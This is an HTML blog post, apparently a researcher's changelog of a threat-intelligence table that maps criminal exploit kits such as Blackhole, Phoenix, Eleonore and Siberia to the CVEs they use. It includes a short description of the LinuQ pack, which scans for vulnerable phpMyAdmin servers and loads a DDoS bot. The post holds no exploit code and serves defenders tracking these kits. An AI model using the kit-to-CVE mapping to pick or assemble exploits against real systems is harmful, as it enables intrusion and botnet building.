<div style="text-align: left;">
</div>
<br />
<br />
<div style="text-align: left;">
</div>
<div style="text-align: left;" trbidi="on">
<div style="text-align: left;" trbidi="on">
<div style="background-color: #fff2cc;">
<i><span style="font-size: small;"><b>Version 15. January 28, 2012</b></span></i></div>
<br />
<span style="font-size: small;">Additions - with many thanks to Kahu Security</span><br />
<br />
<span style="font-size: small;"> </span><span style="font-size: large;"><span style="font-size: small;">Hierarchy Exploit Pack<br />
=================<br />
<span style="font-size: x-small;">CVE-2006-0003<br />
CVE-2009-0927<br />
CVE-2010-0094<br />
CVE-2010-0188<br />
CVE-2010-0806<br />
CVE-2010-0840<br />
CVE-2010-1297<br />
CVE-2010-1885<br />
CVE-2011-0611<br />
JavaSignedApplet</span><br />
<br />
Siberia Private<br />
==========<br />
<span style="font-size: x-small;">CVE-2005-0055<br />
CVE-2006-0003<br />
CVE-2007-5659<br />
CVE-2008-2463<br />
CVE-2008-2992<br />
CVE-2009-0075<br />
CVE-2009-0927<br />
CVE-2009-3867<br />
CVE-2009-4324<br />
CVE-2010-0806</span><br />
<br />
Techno XPack<br />
===========<br />
<span style="font-size: x-small;">CVE-2008-2992<br />
CVE-2010-0188<br />
CVE-2010-0842<br />
CVE-2010-1297<br />
CVE-2010-2884<br />
CVE-2010-3552<br />
CVE-2010-3654<br />
JavaSignedApplet</span><br />
<br />
"Yang Pack"<br />
=========<br />
<span style="font-size: x-small;">CVE-2010-0806<br />
CVE-2011-2110<br />
CVE-2011-2140<br />
CVE-2011-354</span></span></span><span style="font-size: x-small;"><b><b><b><br />
</b></b></b></span><br />
<b><b><b><span style="font-size: large;"><br />
</span></b></b></b> <br />
<div style="text-align: left;" trbidi="on">
<div style="background-color: #fff2cc;">
<i><span style="font-size: small;"><b>Version 14. January 19, 2012</b></span></i></div>
<b><br />
</b> <br />
<div style="font-family: inherit;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXWFdRcGzpehhB5jCWV2bqb6TcDPvdkpiGhUcdVqXZDgs7T_ioKZUC-YwBddqWxBHH70W4jIZu_tebJmWrkcHnXesanTkR6_MSta0_9XZSP7BzFNWZmKI_cCJQtZg9kmOggYksmp2xVqQ/s1600/ww.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXWFdRcGzpehhB5jCWV2bqb6TcDPvdkpiGhUcdVqXZDgs7T_ioKZUC-YwBddqWxBHH70W4jIZu_tebJmWrkcHnXesanTkR6_MSta0_9XZSP7BzFNWZmKI_cCJQtZg9kmOggYksmp2xVqQ/s400/ww.jpg" width="87" /></a></div>
<b>Version 14 Exploit Pack table additions:</b><br />
<br />
Credits for the excellent <a href="http://www.kahusecurity.com/2011/wild-wild-west-%E2%80%93-102011/">Wild Wild West (October 2011 edition) go to </a><b><a href="http://www.kahusecurity.com/2011/wild-wild-west-%E2%80%93-102011/">kahusecurity.com</a></b><br />
<br />
With many thanks to <a href="http://xylibox.blogspot.com/">XyliBox (Xylitol - Steven), </a><a href="http://malwareint.blogspot.com/">Malware Intelligence blog</a>, and xakepy.cc for the information:<br />
<b> </b><br />
<blockquote class="tr_bq">
<blockquote class="tr_bq">
<ol style="text-align: left;">
<li><b>Blackhole 1.2.1</b> (Java Rhino added, weaker Java exploits removed)</li>
<li><b>Blackhole 1.2.1 </b>(Java Skyline added)</li>
<li><b>Sakura Exploit Pack 1.0 </b> (new kid on the block, private pack)</li>
<li><b>Phoenix 2.8. mini</b> (condensed version of 2.7)</li>
<li><b>Fragus Black</b> (weak Spanish twist on the original, black colored admin panel, a few old exploits added) </li>
</ol>
</blockquote>
</blockquote>
If you find any errors or CVE information for packs not featured , please send it to my email (in my profile above, thank you very much) . <br />
<table border="0" cellpadding="0" cellspacing="0" style="width: 374px;"><tbody style="text-align: left;">
<tr height="33" style="text-align: left;"><td class="xl65" height="33" style="height: 24.75pt; text-align: left; width: 281pt;" width="374"><br />
<br /></td><td class="xl65" height="33" style="height: 24.75pt; text-align: left; width: 281pt;" width="374"><br />
<br />
<br />
<br />
<br /></td><td class="xl65" height="33" style="height: 24.75pt; text-align: left; width: 281pt;" width="374"><br /></td><td class="xl65" height="33" style="height: 24.75pt; text-align: left; width: 281pt;" width="374"><br /></td> </tr>
</tbody></table>
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0OjH-UX36jO5FxHu9m3dq0zJlG81PXNOdu79G46PwEq7R5jKuPwDbAT7k6wq2umCTjMhj6D3XPsSIuIxSZhAopbE26HwECFFAQYHuWQIsWyq7SVWoiI7ahTFQx9gF7YpAz1gieMiol-s/s1600/bh.GIF" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="77" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0OjH-UX36jO5FxHu9m3dq0zJlG81PXNOdu79G46PwEq7R5jKuPwDbAT7k6wq2umCTjMhj6D3XPsSIuIxSZhAopbE26HwECFFAQYHuWQIsWyq7SVWoiI7ahTFQx9gF7YpAz1gieMiol-s/s200/bh.GIF" width="200" /></a></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhY52csMiHH2Uvj42DqVjw41dTaMacIWYzmven2dG4-tkgCFT-TFzNwDQZYewqtJh8yVV10Y7zvKe5rW5tIP3Jqz-rUQlqDkH71UnvV-hSQSTOchprfPQ3FmFpzWj74vqWhK0LtyarkgGc/s1600/mini.GIF" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhY52csMiHH2Uvj42DqVjw41dTaMacIWYzmven2dG4-tkgCFT-TFzNwDQZYewqtJh8yVV10Y7zvKe5rW5tIP3Jqz-rUQlqDkH71UnvV-hSQSTOchprfPQ3FmFpzWj74vqWhK0LtyarkgGc/s1600/mini.GIF" /></a><br />
<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_nAY1Z7zJ84jmI-IdPOn2RkDyxAr4QCDEp5qDcF02j1LhKWdGZobIGUN-_P4MIf66Vn51gIYd5LAuLaZRcIUk-d8VRCG8kOu_i3xmfYtevJThxOp2pwmyIT8Rof6tJIq4pqpgxtdp8c4/s1600/sak.GIF" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_nAY1Z7zJ84jmI-IdPOn2RkDyxAr4QCDEp5qDcF02j1LhKWdGZobIGUN-_P4MIf66Vn51gIYd5LAuLaZRcIUk-d8VRCG8kOu_i3xmfYtevJThxOp2pwmyIT8Rof6tJIq4pqpgxtdp8c4/s1600/sak.GIF" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeTw24MHqscfjeIwOxw0vtRnrjqdIiplUfF1RQEA0oXTL9XgV6M5Hb209adrfXwrQehU-wHfoiD63m8IY9VxX3sqjcRe79gli57UEVuM7fnYxS7CHdjHK6XcwPxJ7-oCa6UsCv6pVPQIA/s1600/f.GIF" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeTw24MHqscfjeIwOxw0vtRnrjqdIiplUfF1RQEA0oXTL9XgV6M5Hb209adrfXwrQehU-wHfoiD63m8IY9VxX3sqjcRe79gli57UEVuM7fnYxS7CHdjHK6XcwPxJ7-oCa6UsCv6pVPQIA/s1600/f.GIF" /></a></div>
<br />
<br />
<br />
<br />
<br />
<b><b><b><span style="font-size: large;"></span></b></b></b><br />
<b><b><b><span style="font-size: large;"> </span></b></b></b><br />
<b><b><b><span style="font-size: large;">The full table in xls format - Version 14 can be downloaded from here. </span></b></b></b><br />
<br />
<a href="http://www.mediafire.com/?9t6fq3m9juv4978"><b><b><b><span style="font-size: large;"><span style="font-size: small;">The exploit pack table in XLSX format</span></span></b></b></b></a><br />
<a href="http://www.mediafire.com/?ohpv66qbx3e1bgd"><b><b><b><span style="font-size: large;"><span style="font-size: small;">The exploit pack table in csv format</span></span></b></b></b></a><b><b><b><span style="font-size: large;"><span style="font-size: small;"> </span></span></b></b></b></div>
<div style="text-align: left;" trbidi="on">
<b><b><b><span style="font-size: large;"><a href="http://www.mediafire.com/?jhj1u2twkdvymfh"><span style="font-size: small;">The references sheet in csv format </span></a> </span></b></b></b></div>
<div style="text-align: left;" trbidi="on">
<b><b><b><span style="font-size: large;"><br />
</span></b></b></b> <span style="font-size: large;"><span style="font-size: small;">P.S. There are always corrections and additions thanks to your feedback after the document release, come back in a day or two to check in case v.15 is out.</span></span><b><b><b><span style="font-size: large;"><br />
</span></b></b></b><br />
<br />
<br />
<div style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSjw4ziNGyHfFcVcKT6-IBwcActEuTwCbSVS0hylfGKy3KeN_upQbs47lz0dzg40UyvxaEjq-adyJEvWFzx0JqBJSY8_BPd9kQmz-CiY83LAyiBrgU5zq4f-eGiHWIQRreMNBKZNP1s-A/s1600/zero.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div>
<div style="background-color: #fff2cc;">
<i><span style="font-size: small;"><b>Version 13. Aug 20, 2011</b></span></i></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8achCWgXBl9fywNm1IxZ33rrXTpPRYBaIWJhKw8dDe9CNC8wasavx5lvCu96ufLx2V_6KfxA9Ao0LAToixpQ8q2ad7Iw-f2AQyTpRNc-dEtW8Gun52LM_fd8JoxEiDUyy8EteU9tZqFk/s1600/wildwildwest_0811.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"><br />
</a></div>
<a href="http://www.kahusecurity.com/2011/wild-wild-west-%E2%80%93-082011/">Kahusecurity issued an updated version of their Wild Wild West graphic</a> that will help you learn Who is Who in the world of exploit packs. You can view the full version of their post in the link above.<br />
<br />
<div style="font-family: Georgia,"Times New Roman",serif;">
<span style="font-size: small;"><b>Version 13 exploit pack table additions:</b></span></div>
<ol>
<li>Bleeding Life 3.0</li>
<li>Merry Christmas Pack <a href="http://www.kahusecurity.com/2011/christmas-pack-in-july/"><i>(<span style="font-size: small;">many thanks to kahusecurity.com)+</span></i></a></li>
<li>Best Pack <a href="http://www.kahusecurity.com/2011/best-pack/"><i>(<span style="font-size: small;">many thanks to kahusecurity.com)</span></i></a></li>
<li> Sava Pack <a href="http://www.kahusecurity.com/2011/sava-exploits-pack/"><i>(<span style="font-size: small;">many thanks to kahusecurity.com)</span></i></a></li>
<li><span style="font-size: small;">LinuQ </span></li>
<li><span style="font-size: small;">Eleonore 1.6.5</span></li>
<li>Zero Pack </li>
<li>Salo Pack (incomplete but it is also old)</li>
</ol>
<b><b><b><span style="font-size: large;"></span></b></b></b> <br />
<br />
<br />
<div style="border: 3px solid green; height: 320px; overflow: auto; text-align: left; width: 450px;">
<span style="color: black;"><b><span style="color: red;">List of packs in the table in alphabetical order</span></b></span><br />
<ol>
<li><span style="color: black;">Best Pack</span></li>
<li><span style="color: black;">Blackhole Exploit 1.0</span></li>
<li><span style="color: black;">Blackhole Exploit 1.1</span></li>
<li><span style="color: black;">Bleeding Life 2.0</span></li>
<li><span style="color: black;">Bleeding Life 3.0 </span></li>
<li><span style="color: black;">Bomba</span></li>
<li><span style="color: black;">CRIMEPACK 2.2.1</span></li>
<li><span style="color: black;">CRIMEPACK 2.2.8</span></li>
<li><span style="color: black;">CRIMEPACK 3.0</span></li>
<li><span style="color: black;">CRIMEPACK 3.1.3</span></li>
<li><span style="color: black;">Dloader</span></li>
<li><span style="color: black;">EL Fiiesta</span></li>
<li><span style="color: black;">Eleonore 1.3.2</span></li>
<li><span style="color: black;">Eleonore 1.4.1 </span></li>
<li><span style="color: black;">Eleonore 1.4.4 Moded</span></li>
<li><span style="color: black;">Eleonore 1.6.3a</span></li>
<li><span style="color: black;">Eleonore 1.6.4</span></li>
<li><span style="color: black;">Eleonore 1.6.5 </span></li>
<li><span style="color: black;">Fragus 1</span></li>
<li><span style="color: black;">Icepack</span></li>
<li><span style="color: black;">Impassioned Framework 1.0</span></li>
<li><span style="color: black;">Incognito</span></li>
<li><span style="color: black;">iPack</span></li>
<li><span style="color: black;">JustExploit</span></li>
<li><span style="color: black;">Katrin</span></li>
<li><span style="color: black;">Merry Christmas Pack </span></li>
<li><span style="color: black;">Liberty 1.0.7</span></li>
<li><span style="color: black;">Liberty 2.1.0*</span></li>
<li><span style="color: black;">LinuQ pack </span></li>
<li><span style="color: black;">Lupit</span></li>
<li><span style="color: black;">Mpack</span></li>
<li><span style="color: black;">Mushroom/unknown</span></li>
<li><span style="color: black;">Open Source Exploit (Metapack)</span></li>
<li><span style="color: black;">Papka</span></li>
<li><span style="color: black;">Phoenix 2.0 </span></li>
<li><span style="color: black;">Phoenix 2.1</span></li>
<li><span style="color: black;">Phoenix 2.2</span></li>
<li><span style="color: black;">Phoenix 2.3</span></li>
<li><span style="color: black;">Phoenix 2.4</span></li>
<li><span style="color: black;">Phoenix 2.5</span></li>
<li><span style="color: black;">Phoenix 2.7</span></li>
<li><span style="color: black;">Robopak</span></li>
<li><span style="color: black;">Salo pack </span></li>
<li><span style="color: black;">Sava Pack </span></li>
<li><span style="color: black;">SEO Sploit pack</span></li>
<li><span style="color: black;">Siberia</span></li>
<li><span style="color: black;">T-Iframer</span></li>
<li><span style="color: black;">Unique Pack Sploit 2.1</span></li>
<li><span style="color: black;">Webattack</span></li>
<li><span style="color: black;">Yes Exploit 3.0RC</span></li>
<li><span style="color: black;">Zero Pack </span></li>
<li><span style="color: black;">Zombie Infection kit </span></li>
<li><span style="color: black;">Zopack</span></li>
</ol>
</div>
<br />
<br />
----------------------------------------------<br />
<span style="color: red;">Bleeding Life 3.0 </span><br />
<a href="http://www.opensc.ws/unverified-listings/16175-bleedinglife-3-0-free-updates-amazing-features.html">New Version Ad is here </a><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaZnYtQg8DLHkD-v-dWWMifsvGPyYIRlgCoPThK_kP7pCCFMdak0wftBt2cnWb4M1CMUwS4xKNmVMK78t4GgIsSNTsZszs00vrejSIsWsps9zfFY8VaLb6mhbhcd552uyjOajm7Eh7dAE/s1600/bleeding+life.JPG" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaZnYtQg8DLHkD-v-dWWMifsvGPyYIRlgCoPThK_kP7pCCFMdak0wftBt2cnWb4M1CMUwS4xKNmVMK78t4GgIsSNTsZszs00vrejSIsWsps9zfFY8VaLb6mhbhcd552uyjOajm7Eh7dAE/s1600/bleeding+life.JPG" style="color: red;" /></a> <br />
<table border="1" cellpadding="2" cellspacing="2" style="height: 116px; text-align: left; width: 605px;"><tbody style="text-align: left;">
<tr style="text-align: left;"> <td style="text-align: left;"><div class="separator" style="clear: both; text-align: center;">
</div>
<div style="color: red;">
Merry Christmas Pack</div>
read analysis at<br />
<a href="http://www.kahusecurity.com/2011/christmas-pack-in-july/"><i><span style="font-size: small;">kahusecurity.com</span></i></a><br />
<i><span style="font-size: small;"> </span></i><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2qVkbqt89KmTaWP783SOkxvpidxnTRkOwgxHeLGr8JW2JWekBvHsq4E88Rg0iBqb4l06927e2P2A8RHCC0lLfK-QILAltRy207_7zAVjX7EMvNVDzwMnWbo0A04coigDy-zDDm_E0jKo/s1600/merryxmaspack.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="41" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2qVkbqt89KmTaWP783SOkxvpidxnTRkOwgxHeLGr8JW2JWekBvHsq4E88Rg0iBqb4l06927e2P2A8RHCC0lLfK-QILAltRy207_7zAVjX7EMvNVDzwMnWbo0A04coigDy-zDDm_E0jKo/s200/merryxmaspack.JPG" width="200" /></a></div>
</td> <td style="text-align: left;"><div style="background-color: white; color: red;">
Best Pack<br />
<span style="color: black;">read analysis at </span> <i></i></div>
<a href="http://www.kahusecurity.com/2011/best-pack/"><i><span style="font-size: small;">kahusecurity.com</span></i></a><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8em8dnlKvx7MXk2bGDlycLxoyPeWQE-f6ej4nhQEZyseP3onEOfVrTQeuuqx9NFXND5AD8usKB16ieWEZBCzyRMbep8f-C5qgBSr5VxD1IDGrxekGLhDnMRewt5CC5D0nETEgp6Mwu9c/s1600/bestp.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="78" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8em8dnlKvx7MXk2bGDlycLxoyPeWQE-f6ej4nhQEZyseP3onEOfVrTQeuuqx9NFXND5AD8usKB16ieWEZBCzyRMbep8f-C5qgBSr5VxD1IDGrxekGLhDnMRewt5CC5D0nETEgp6Mwu9c/s200/bestp.JPG" width="200" /></a></div>
</td> <td style="text-align: left;"><span style="color: red;">Sava Pack </span><br />
read analysis at<br />
<a href="http://www.kahusecurity.com/2011/sava-exploits-pack/"><i><span style="font-size: small;">kahusecurity.com</span></i></a><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNY9JczszDS-lmWKXbDhHuUEMi16cHBoFAHTAla6yqO98VelHNQp0ZN73a2zbTTBSrNOGBk70iPJ-M_FPXMFZxkzcsI_b9gv3uxa861aTxjyw5CJkdosMw4oCRiCFeNQWOZ4XFtmaD-Eo/s1600/sava.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="65" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNY9JczszDS-lmWKXbDhHuUEMi16cHBoFAHTAla6yqO98VelHNQp0ZN73a2zbTTBSrNOGBk70iPJ-M_FPXMFZxkzcsI_b9gv3uxa861aTxjyw5CJkdosMw4oCRiCFeNQWOZ4XFtmaD-Eo/s200/sava.JPG" width="200" /></a></div>
</td> </tr>
<tr style="text-align: left;"> <td style="text-align: left;"><div style="color: red;">
<span style="font-size: small;">Eleonore 1.6.5 </span></div>
<div style="color: red;">
<span style="font-size: small;"><span style="color: black;">[+] CVE-2011-0611</span></span><span style="font-size: small;"><br />
</span><span style="font-size: small;"><span style="color: black;">[+] </span></span><span style="color: black;">CVE-2011-0559<br />
[+] CVE-2010-4452 <br />
[-] CVE-2010-0886 </span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIcw7z2okIEHWr4NXLzggEbrgivy9st2gtGLJfSGcQ_us5LGa0jT8CUEM3JLY35ZYwQo40x9_5EPgfdimWqqB5sbYh-udReMZW8bCdRmmXms3uWrSNLaBnw211bTPz5-HymGqmYJ24Tv0/s1600/eleonore.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="78" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIcw7z2okIEHWr4NXLzggEbrgivy9st2gtGLJfSGcQ_us5LGa0jT8CUEM3JLY35ZYwQo40x9_5EPgfdimWqqB5sbYh-udReMZW8bCdRmmXms3uWrSNLaBnw211bTPz5-HymGqmYJ24Tv0/s200/eleonore.JPG" width="200" /></a></div>
</td> <td style="text-align: left;"><span style="color: red;">Salo Pack</span><br />
Old (2009), added just for <br />
the collection<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfozI8zHAL0I9va9UX3MVwkeC-aTYXViqgd7OPBv1g7sj0QCCB5iHfF3gvTFQX8zfpa9T3vHsI_BzU8UMQR0JUdy2I4HPv3BdVDLs6QwOLO3mdZaMOPeXmMKIuw0_VJE1_D4K_26q1gJ4/s1600/salo.JPG" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfozI8zHAL0I9va9UX3MVwkeC-aTYXViqgd7OPBv1g7sj0QCCB5iHfF3gvTFQX8zfpa9T3vHsI_BzU8UMQR0JUdy2I4HPv3BdVDLs6QwOLO3mdZaMOPeXmMKIuw0_VJE1_D4K_26q1gJ4/s1600/salo.JPG" /></a><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBSwLyjzyeovK1929rFQbHEIFevSdzRVzxy3I3sOZRsrK0pEQPjmNP_rghE8XUCdg622ScpNoxAFqFd0dHr6kMIIhbTXnC3_B8J1CcGqznJtkcCGqb7awDxQRSrdG-modoiH2ZXHFQKyg/s1600/zero.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"><br />
</a></div>
</td><td style="text-align: left;"><span id="goog_936959925"></span><span id="goog_936959926"></span><span style="color: red;">Zero Pack</span><br />
62 exploits from various packs (mostly Open Source pack)<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSjw4ziNGyHfFcVcKT6-IBwcActEuTwCbSVS0hylfGKy3KeN_upQbs47lz0dzg40UyvxaEjq-adyJEvWFzx0JqBJSY8_BPd9kQmz-CiY83LAyiBrgU5zq4f-eGiHWIQRreMNBKZNP1s-A/s1600/zero.JPG" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="93" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSjw4ziNGyHfFcVcKT6-IBwcActEuTwCbSVS0hylfGKy3KeN_upQbs47lz0dzg40UyvxaEjq-adyJEvWFzx0JqBJSY8_BPd9kQmz-CiY83LAyiBrgU5zq4f-eGiHWIQRreMNBKZNP1s-A/s200/zero.JPG" width="200" /></a></td> </tr>
<tr style="text-align: left;"> <td colspan="3" rowspan="1" style="text-align: left;"><div style="color: red;">
LinuQ pack</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4N7Baqm1Be1f54prNtpNYEjFeIQPIIw9Fo2oAqr330_Qk2RUnw0aVNBP7JtF18j_o82lavVWYsncOekbGOLUv2h8qwEgui95vRvMqx0tLuhqRi54zAG7z41q5jzAuCmAcM7UUCn825Bs/s1600/linuq.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4N7Baqm1Be1f54prNtpNYEjFeIQPIIw9Fo2oAqr330_Qk2RUnw0aVNBP7JtF18j_o82lavVWYsncOekbGOLUv2h8qwEgui95vRvMqx0tLuhqRi54zAG7z41q5jzAuCmAcM7UUCn825Bs/s1600/linuq.png" /></a></div>
Designed to compromise linux servers using vulnerable PHPMyAdmin. Comes with DDoS bot but any kind of code can be loaded for Linux botnet creation.<br />
LinuQ pack is PhpMyAdmin exploit pack with 4 PMA exploits based on a previous Russian version of the Romanian PMA <a href="http://linux.m2osw.com/zmeu-attack">scanner ZmEu</a>. it is not considered to be original, unique, new, or anything special. All exploits are public and known well.<br />
<br />
<br />
It is designed to be installed on an IRC server (like UnrealIRCD). IP ranges already listed in bios.txt can be scanned, vulnerable IPs and specific PMA vulnerabilities will be listed in vuln.txt, then the corresponding exploits can be launched against the vulnerable server. It is more like a bot using PMA vulnerabilities than exploit pack.<br />
It is using <br />
CVE-2009-1148 (unconfirmed)<br />
CVE-2009-1149 (unconfirmed)<br />
CVE-2009-1150 (unconfirmed)<br />
CVE-2009-1151 (confirmed)<br />
<br /></td> </tr>
</tbody> </table>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLXIGAru4_U3yadA7eGfijxqdGttEEkS0DASaaEHYnImbPpdyRnbwP8KmH8cmdOzSpcEi9pqI9YM-B9mYJ91nUoqoRLsmFHDA76rg7q5O0hj6xn01VXOqd-SkpfVLNpH63N11isoob9X4/s1600/sshot.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="267" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLXIGAru4_U3yadA7eGfijxqdGttEEkS0DASaaEHYnImbPpdyRnbwP8KmH8cmdOzSpcEi9pqI9YM-B9mYJ91nUoqoRLsmFHDA76rg7q5O0hj6xn01VXOqd-SkpfVLNpH63N11isoob9X4/s400/sshot.JPG" width="400" /></a></div>
<br />
<br />
====================================================================<br />
<div style="background-color: white; color: yellow;">
<div>
<div>
<div>
<div style="background-color: white; color: black;">
<div style="background-color: white;">
<div style="background-color: white;">
<i><span style="font-size: small;"><b>Version 12. May 26, 2011</b></span></i></div>
<div style="background-color: white;">
<span style="font-size: small;"><b> additional changes (many thanks to kahusecurity.com)</b></span></div>
<div style="background-color: white;">
</div>
<div style="background-color: white; color: #274e13;">
<b>Bomba</b></div>
<div style="background-color: white;">
<b><span style="color: #274e13;">Papka</span></b><br />
<br />
<span style="color: #274e13;">See the list of packs covered in the list below </span><b><span style="color: #274e13;"><br />
</span></b><br />
<br />
<b><a href="http://www.mediafire.com/?wnd4lzfh4zmqd0k"><b><span style="font-size: large;">The full table in xls format - Version 12 can be downloaded from here.</span></b></a></b><br />
<div style="background-color: white;">
I want to thank everyone who sent packs and information :)</div>
<div style="background-color: white;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNRDJIzIrY13n0dnunU8sWUpeeu-qKCfEoWjZiutV0ZEFJjXwqXdK8nWgmDPRONbIMs1IaJ2mUhYJvrjH8rTMF5jT5UBLx2MUQ_IuAIhnN3dTehmyV72tmb9AWnvV8axanRvWykWh3zMo/s1600/hh.bmp" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="155" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNRDJIzIrY13n0dnunU8sWUpeeu-qKCfEoWjZiutV0ZEFJjXwqXdK8nWgmDPRONbIMs1IaJ2mUhYJvrjH8rTMF5jT5UBLx2MUQ_IuAIhnN3dTehmyV72tmb9AWnvV8axanRvWykWh3zMo/s200/hh.bmp" width="200" /></a><i><br />
</i></div>
<div style="background-color: white;">
<br />
<br />
<br />
<br />
<i><b>Version 11 </b></i><i><b>May 26, 2011 Changes: </b></i><br />
<ol></ol>
<div style="text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGQq3d6YPzplEZAaM1gwOA9K3m2NTKjqU7Sd0npCgyExm-xW-5zE9X2dMHcnvLcM81V6s7G3I8p-8UxYqLnY5wnpSncKVgIFJvCDINTXOkQe39fUxhGmR5N2GiDUc8GWtBanQGVuB0q8Y/s1600/sshot.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="125" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGQq3d6YPzplEZAaM1gwOA9K3m2NTKjqU7Sd0npCgyExm-xW-5zE9X2dMHcnvLcM81V6s7G3I8p-8UxYqLnY5wnpSncKVgIFJvCDINTXOkQe39fUxhGmR5N2GiDUc8GWtBanQGVuB0q8Y/s200/sshot.JPG" width="200" /></a></div>
<ol>
<li style="color: #274e13;"><b>Phoenix2.7</b></li>
<li style="color: #274e13;"><b>"</b><i>Dloader</i><b>" </b>(well, dloader is a loader but the pack is some unnamed pack <a href="http://damagelab.org/lofiversion/index.php?t=20852">http://damagelab.org/lofiversion/index.php?t=20852</a><b>)</b></li>
<li style="color: #274e13;"><b>nuclear pack</b></li>
<li style="color: #274e13;"><b>Katrin </b></li>
<li style="color: #274e13;"><b>Robopak</b></li>
<li style="color: #274e13;"><b>Blackhole exploit kit 1.1.0</b></li>
<li style="color: #274e13;"><b>Mushroom/unknown</b></li>
<li><b><span style="color: #274e13;">Open Source Exploit kit</span></b><b><br />
</b></li>
</ol>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiagZpH4gnOdrp8nDlyBhSXbxkLCvKnKSEPtqiNpmLal2qn052_TAA9pXb25W76mG7DiXiytT6boTkclfB_2gxdu70nWWAYWCcC9nrOSe5ttdAIIuakrB6PYqRLvjrWfNghB-VaD2_H-XY/s1600/sshot.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiagZpH4gnOdrp8nDlyBhSXbxkLCvKnKSEPtqiNpmLal2qn052_TAA9pXb25W76mG7DiXiytT6boTkclfB_2gxdu70nWWAYWCcC9nrOSe5ttdAIIuakrB6PYqRLvjrWfNghB-VaD2_H-XY/s200/sshot.jpg" width="200" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
<left></left><br />
